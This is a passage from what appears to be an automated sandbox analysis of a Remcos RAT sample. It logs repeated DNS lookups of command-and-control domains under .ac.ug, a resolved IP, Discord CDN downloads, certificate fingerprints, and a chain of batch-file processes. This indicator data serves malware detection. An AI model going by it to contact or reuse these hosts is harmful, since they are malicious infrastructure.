Jun 4, 2021 09:41:41.715715885 CEST	192.168.2.4	8.8.8.8	0x6600	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:42.777014971 CEST	192.168.2.4	8.8.8.8	0xad4	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:43.996402025 CEST	192.168.2.4	8.8.8.8	0x793	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:45.058801889 CEST	192.168.2.4	8.8.8.8	0x5657	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:46.277839899 CEST	192.168.2.4	8.8.8.8	0x2653	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:47.362359047 CEST	192.168.2.4	8.8.8.8	0x7ab2	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:48.591324091 CEST	192.168.2.4	8.8.8.8	0x35d4	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:49.652962923 CEST	192.168.2.4	8.8.8.8	0xd25	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:50.874732971 CEST	192.168.2.4	8.8.8.8	0xaead	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:51.934591055 CEST	192.168.2.4	8.8.8.8	0xdbc9	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:53.155333042 CEST	192.168.2.4	8.8.8.8	0x4d	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:54.217448950 CEST	192.168.2.4	8.8.8.8	0x2254	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:55.435005903 CEST	192.168.2.4	8.8.8.8	0x80a1	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:56.497416019 CEST	192.168.2.4	8.8.8.8	0x4054	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:57.716850996 CEST	192.168.2.4	8.8.8.8	0x337a	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:58.778393984 CEST	192.168.2.4	8.8.8.8	0x7eae	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:59.995588064 CEST	192.168.2.4	8.8.8.8	0x8ef4	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:01.040570021 CEST	192.168.2.4	8.8.8.8	0x6fbe	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:02.247749090 CEST	192.168.2.4	8.8.8.8	0xf03c	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:03.308010101 CEST	192.168.2.4	8.8.8.8	0x70d4	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:04.529351950 CEST	192.168.2.4	8.8.8.8	0xd48e	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 4, 2021 09:39:57.198767900 CEST	8.8.8.8	192.168.2.4	0xf48b	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:39:57.198767900 CEST	8.8.8.8	192.168.2.4	0xf48b	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:39:57.198767900 CEST	8.8.8.8	192.168.2.4	0xf48b	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:39:57.198767900 CEST	8.8.8.8	192.168.2.4	0xf48b	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:39:57.198767900 CEST	8.8.8.8	192.168.2.4	0xf48b	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:16.129209995 CEST	8.8.8.8	192.168.2.4	0x559f	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:17.515693903 CEST	8.8.8.8	192.168.2.4	0x89d1	Server failure (2)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:18.656070948 CEST	8.8.8.8	192.168.2.4	0xb28f	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:19.881160975 CEST	8.8.8.8	192.168.2.4	0xd1a1	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:20.940700054 CEST	8.8.8.8	192.168.2.4	0x3c4	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:22.180686951 CEST	8.8.8.8	192.168.2.4	0x54e8	Server failure (2)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:23.238006115 CEST	8.8.8.8	192.168.2.4	0xd2e	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:24.458822012 CEST	8.8.8.8	192.168.2.4	0x9c86	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:25.520107031 CEST	8.8.8.8	192.168.2.4	0x9f28	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:26.738759995 CEST	8.8.8.8	192.168.2.4	0x2b4a	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:27.899045944 CEST	8.8.8.8	192.168.2.4	0xa26b	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.469103098 CEST	8.8.8.8	192.168.2.4	0xa7d5	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.707072973 CEST	8.8.8.8	192.168.2.4	0x4d3d	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.707072973 CEST	8.8.8.8	192.168.2.4	0x4d3d	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.707072973 CEST	8.8.8.8	192.168.2.4	0x4d3d	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.707072973 CEST	8.8.8.8	192.168.2.4	0x4d3d	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.707072973 CEST	8.8.8.8	192.168.2.4	0x4d3d	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:30.605134964 CEST	8.8.8.8	192.168.2.4	0x1860	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:32.028281927 CEST	8.8.8.8	192.168.2.4	0xf6cc	Server failure (2)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:33.085849047 CEST	8.8.8.8	192.168.2.4	0xfa74	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:34.285319090 CEST	8.8.8.8	192.168.2.4	0x59f6	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:35.394838095 CEST	8.8.8.8	192.168.2.4	0xa0a0	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:36.664606094 CEST	8.8.8.8	192.168.2.4	0xef6f	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.057444096 CEST	8.8.8.8	192.168.2.4	0xa9e	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.057444096 CEST	8.8.8.8	192.168.2.4	0xa9e	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.057444096 CEST	8.8.8.8	192.168.2.4	0xa9e	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.057444096 CEST	8.8.8.8	192.168.2.4	0xa9e	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.057444096 CEST	8.8.8.8	192.168.2.4	0xa9e	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.735856056 CEST	8.8.8.8	192.168.2.4	0xbefa	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.959199905 CEST	8.8.8.8	192.168.2.4	0xbefa	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:39.940066099 CEST	8.8.8.8	192.168.2.4	0xaee	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:41.000473976 CEST	8.8.8.8	192.168.2.4	0xd728	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:42.285602093 CEST	8.8.8.8	192.168.2.4	0xdc3d	Server failure (2)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:43.352905035 CEST	8.8.8.8	192.168.2.4	0xb7a7	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:44.667825937 CEST	8.8.8.8	192.168.2.4	0xe6a4	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:45.728987932 CEST	8.8.8.8	192.168.2.4	0x9e3d	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:47.670643091 CEST	8.8.8.8	192.168.2.4	0x7e16	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:49.019717932 CEST	8.8.8.8	192.168.2.4	0x4089	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:50.223773003 CEST	8.8.8.8	192.168.2.4	0x4bbd	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:51.287056923 CEST	8.8.8.8	192.168.2.4	0xc9fc	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:52.494193077 CEST	8.8.8.8	192.168.2.4	0xf5b	Server failure (2)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:53.551012993 CEST	8.8.8.8	192.168.2.4	0xf78e	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:54.753180981 CEST	8.8.8.8	192.168.2.4	0xd592	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:55.813472033 CEST	8.8.8.8	192.168.2.4	0xdb85	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:57.156025887 CEST	8.8.8.8	192.168.2.4	0x13c7	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:58.218678951 CEST	8.8.8.8	192.168.2.4	0x4c29	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:59.560050964 CEST	8.8.8.8	192.168.2.4	0x936c	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:00.669122934 CEST	8.8.8.8	192.168.2.4	0x45ce	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:02.001405954 CEST	8.8.8.8	192.168.2.4	0x4f6d	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:03.061315060 CEST	8.8.8.8	192.168.2.4	0x135a	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:04.290596962 CEST	8.8.8.8	192.168.2.4	0xc8d0	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:05.429944038 CEST	8.8.8.8	192.168.2.4	0xf803	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:06.830806971 CEST	8.8.8.8	192.168.2.4	0xbf57	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:07.903352022 CEST	8.8.8.8	192.168.2.4	0xbfde	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:09.129702091 CEST	8.8.8.8	192.168.2.4	0x1fe4	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:10.197743893 CEST	8.8.8.8	192.168.2.4	0xfe4a	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:11.409699917 CEST	8.8.8.8	192.168.2.4	0x20b0	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:12.471990108 CEST	8.8.8.8	192.168.2.4	0xa7b0	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:13.701833963 CEST	8.8.8.8	192.168.2.4	0x8da9	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:14.761611938 CEST	8.8.8.8	192.168.2.4	0xcb28	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:15.979192019 CEST	8.8.8.8	192.168.2.4	0x84a	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:17.167419910 CEST	8.8.8.8	192.168.2.4	0x6ccc	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:18.453221083 CEST	8.8.8.8	192.168.2.4	0x5dc6	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:19.515099049 CEST	8.8.8.8	192.168.2.4	0xf0df	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:20.731895924 CEST	8.8.8.8	192.168.2.4	0x37f3	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:21.794507027 CEST	8.8.8.8	192.168.2.4	0x1ba3	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:23.012999058 CEST	8.8.8.8	192.168.2.4	0x5b84	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:24.065589905 CEST	8.8.8.8	192.168.2.4	0xfa28	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:25.277705908 CEST	8.8.8.8	192.168.2.4	0x11de	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:26.342190981 CEST	8.8.8.8	192.168.2.4	0xc8df	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:27.559171915 CEST	8.8.8.8	192.168.2.4	0xc7dc	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:28.619645119 CEST	8.8.8.8	192.168.2.4	0x1bb7	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:29.840023994 CEST	8.8.8.8	192.168.2.4	0x5d38	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:30.906867027 CEST	8.8.8.8	192.168.2.4	0x22d3	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:32.156562090 CEST	8.8.8.8	192.168.2.4	0x32b1	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:33.215828896 CEST	8.8.8.8	192.168.2.4	0x54cd	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:34.438519001 CEST	8.8.8.8	192.168.2.4	0xaf5	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:35.498428106 CEST	8.8.8.8	192.168.2.4	0x4e71	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:36.733165979 CEST	8.8.8.8	192.168.2.4	0x7148	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:37.855993032 CEST	8.8.8.8	192.168.2.4	0x1ad8	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:39.199364901 CEST	8.8.8.8	192.168.2.4	0x9738	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:40.531407118 CEST	8.8.8.8	192.168.2.4	0xeb4e	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:41.765302896 CEST	8.8.8.8	192.168.2.4	0x6600	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:42.827914000 CEST	8.8.8.8	192.168.2.4	0xad4	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:44.045500994 CEST	8.8.8.8	192.168.2.4	0x793	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:45.107799053 CEST	8.8.8.8	192.168.2.4	0x5657	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:46.326437950 CEST	8.8.8.8	192.168.2.4	0x2653	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:47.411079884 CEST	8.8.8.8	192.168.2.4	0x7ab2	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:48.640156031 CEST	8.8.8.8	192.168.2.4	0x35d4	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:49.694082975 CEST	8.8.8.8	192.168.2.4	0xd25	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:50.925890923 CEST	8.8.8.8	192.168.2.4	0xaead	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:51.975991011 CEST	8.8.8.8	192.168.2.4	0xdbc9	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:53.196373940 CEST	8.8.8.8	192.168.2.4	0x4d	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:54.265856028 CEST	8.8.8.8	192.168.2.4	0x2254	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:55.483614922 CEST	8.8.8.8	192.168.2.4	0x80a1	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:56.548612118 CEST	8.8.8.8	192.168.2.4	0x4054	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:57.765820980 CEST	8.8.8.8	192.168.2.4	0x337a	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:58.829729080 CEST	8.8.8.8	192.168.2.4	0x7eae	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:00.037149906 CEST	8.8.8.8	192.168.2.4	0x8ef4	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:01.081743956 CEST	8.8.8.8	192.168.2.4	0x6fbe	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:02.300141096 CEST	8.8.8.8	192.168.2.4	0xf03c	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:03.358968019 CEST	8.8.8.8	192.168.2.4	0x70d4	No error (0)	nothinglike.ac.ug		79.134.225.25	A (IP address)	IN (0x0001)
Jun 4, 2021 09:42:04.572482109 CEST	8.8.8.8	192.168.2.4	0xd48e	Name error (3)	brudfascaqezd.ac.ug	none	none	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 4, 2021 09:39:57.388297081 CEST	162.159.130.233	443	192.168.2.4	49729	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jun 4, 2021 09:39:57.388297081 CEST	162.159.130.233	443	192.168.2.4	49729	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19
Jun 4, 2021 09:40:30.392745972 CEST	162.159.134.233	443	192.168.2.4	49755	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jun 4, 2021 09:40:30.392745972 CEST	162.159.134.233	443	192.168.2.4	49755	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19
Jun 4, 2021 09:40:38.192769051 CEST	162.159.133.233	443	192.168.2.4	49759	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jun 4, 2021 09:40:38.192769051 CEST	162.159.133.233	443	192.168.2.4	49759	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: V8IB839cvz.exe PID: 7136 Parent PID: 6068

General

Start time:	09:39:53
Start date:	04/06/2021
Path:	C:\Users\user\Desktop\V8IB839cvz.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\V8IB839cvz.exe'
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Analysis Process: V8IB839cvz.exe PID: 6584 Parent PID: 7136

General

Start time:	09:40:14
Start date:	04/06/2021
Path:	C:\Users\user\Desktop\V8IB839cvz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\V8IB839cvz.exe
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 2228 Parent PID: 7136

General

Start time:	09:40:15
Start date:	04/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6200 Parent PID: 2228

General

Start time:	09:40:15
Start date:	04/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 6540 Parent PID: 2228

General

Start time:	09:40:16
Start date:	04/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6416 Parent PID: 6540

General

Start time:	09:40:16
Start date:	04/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Xypgtv.exe PID: 6740 Parent PID: 3424

General

Start time:	09:40:23
Start date:	04/06/2021
Path:	C:\Users\Public\Xypgtv\Xypgtv.exe
Wow64 process (32bit):	true
